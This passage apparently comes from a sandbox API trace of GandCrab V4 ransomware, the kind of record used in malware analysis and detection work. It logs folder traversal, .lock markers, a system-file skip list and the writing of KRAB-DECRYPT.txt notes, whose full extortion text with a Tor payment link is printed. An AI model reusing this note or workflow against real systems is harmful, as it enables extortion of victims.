DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0062.174] WriteFile (in: hFile=0x448, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0062.175] CloseHandle (hObject=0x448) returned 1 [0062.179] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.179] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.179] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x9, wMilliseconds=0x17f)) [0062.180] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.180] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0062.180] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0062.180] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\d2ca4a08d2ca4dee3d.lock") returned 98 [0062.180] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x448 [0062.181] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.182] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.182] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 75 [0062.182] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0062.182] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbd2e0 [0062.182] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.182] FindNextFileW (in: hFindFile=0xfbd2e0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0062.182] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.182] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.182] FindNextFileW (in: hFindFile=0xfbd2e0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0062.182] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0062.182] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0062.182] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\d2ca4a08d2ca4dee3d.lock" [0062.182] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.183] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 103 [0062.183] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\d2ca4a08d2ca4dee3d.lock") returned 98 [0062.183] lstrlenW (lpString=".lock") returned 5 [0062.183] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.183] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0062.183] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.183] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.184] FindNextFileW (in: hFindFile=0xfbd2e0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0062.184] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0062.184] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0062.184] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\KRAB-DECRYPT.txt" [0062.184] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.184] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\KRAB-DECRYPT.txt.KRAB") returned 96 [0062.184] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\KRAB-DECRYPT.txt") returned 91 [0062.184] lstrlenW (lpString=".txt") returned 4 [0062.184] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.185] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0062.185] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.185] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\KRAB-DECRYPT.txt") returned 91 [0062.185] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\KRAB-DECRYPT.txt") returned 91 [0062.185] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0062.185] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0062.185] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0062.185] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0062.185] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0062.185] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0062.185] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0062.185] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0062.185] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0062.185] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0062.185] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.186] FindNextFileW (in: hFindFile=0xfbd2e0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0062.186] FindClose (in: hFindFile=0xfbd2e0 | out: hFindFile=0xfbd2e0) returned 1 [0062.186] CloseHandle (hObject=0x448) returned 1 [0062.186] FindNextFileW (in: hFindFile=0xfbd720, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0062.186] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0062.186] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0062.186] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\d2ca4a08d2ca4dee3d.lock" [0062.186] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.187] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 98 [0062.187] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\d2ca4a08d2ca4dee3d.lock") returned 93 [0062.187] lstrlenW (lpString=".lock") returned 5 [0062.187] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.187] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0062.187] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.187] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.188] FindNextFileW (in: hFindFile=0xfbd720, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0062.188] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0062.188] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0062.188] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\KRAB-DECRYPT.txt" [0062.188] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.188] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\KRAB-DECRYPT.txt.KRAB") returned 91 [0062.188] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\KRAB-DECRYPT.txt") returned 86 [0062.188] lstrlenW (lpString=".txt") returned 4 [0062.188] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.188] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0062.189] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.189] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\KRAB-DECRYPT.txt") returned 86 [0062.189] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\KRAB-DECRYPT.txt") returned 86 [0062.189] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0062.189] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0062.189] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0062.189] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0062.189] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0062.189] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0062.189] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0062.189] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0062.189] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0062.189] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0062.189] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.190] FindNextFileW (in: hFindFile=0xfbd720, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0062.190] FindClose (in: hFindFile=0xfbd720 | out: hFindFile=0xfbd720) returned 1 [0062.190] CloseHandle (hObject=0x440) returned 1 [0062.190] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0062.190] FindClose (in: hFindFile=0xfbd1e0 | out: hFindFile=0xfbd1e0) returned 1 [0062.190] CloseHandle (hObject=0x3ac) returned 1 [0062.190] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0062.190] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0062.190] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0062.191] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Templates" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates" [0062.191] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\" [0062.191] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0062.191] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0062.191] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0062.191] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0062.191] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0062.201] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.201] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.201] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\\\KRAB-DECRYPT.txt") returned 75 [0062.202] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0062.217] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0062.217] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0062.218] CloseHandle (hObject=0x3ac) returned 1 [0062.218] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.218] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.219] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x9, wMilliseconds=0x19f)) [0062.219] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.219] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0062.219] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0062.219] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\d2ca4a08d2ca4dee3d.lock") returned 81 [0062.219] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0062.220] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.220] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.220] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\") returned 58 [0062.220] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\*" [0062.220] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd7a0 [0062.221] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.221] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.221] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.221] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.221] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.221] lstrcmpW (lpString1="Calendar insights.xltm", lpString2=".") returned 1 [0062.221] lstrcmpW (lpString1="Calendar insights.xltm", lpString2="..") returned 1 [0062.221] lstrcatW (in: 